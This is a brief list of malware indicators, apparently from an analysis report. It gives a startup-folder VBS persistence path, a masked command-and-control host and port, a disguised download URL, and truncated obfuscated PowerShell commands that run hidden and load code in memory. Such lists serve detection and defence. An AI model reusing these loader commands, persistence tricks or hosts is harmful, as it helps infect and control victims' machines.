Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\system32.vbs
- 'ra#####ia.gleeze.com':1177
- http://www.4u##.com/uploads/file_2020-05-17_201425.mov
- DNS ASK 4u##.com
- DNS ASK ra#####ia.gleeze.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAiAGMAdQBgAFIAUgBlAE4AdABEAGAATwBgAE0AYQBpAE4AIgAuACIATABPAGAAQQBkACIAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAHsAMAB9AHsANAB9AHsAMQB9AHsAMgB9AHsAMwB...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAiAGMAdQBgAFIAUgBlAE4AdABEAGAATwBgAE0AYQBpAE4AIgAuACIATABPAGAAQQBkACIAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAHsAMAB9AHsANAB9AHsAMQB9AHsAMgB9AHsAMwB...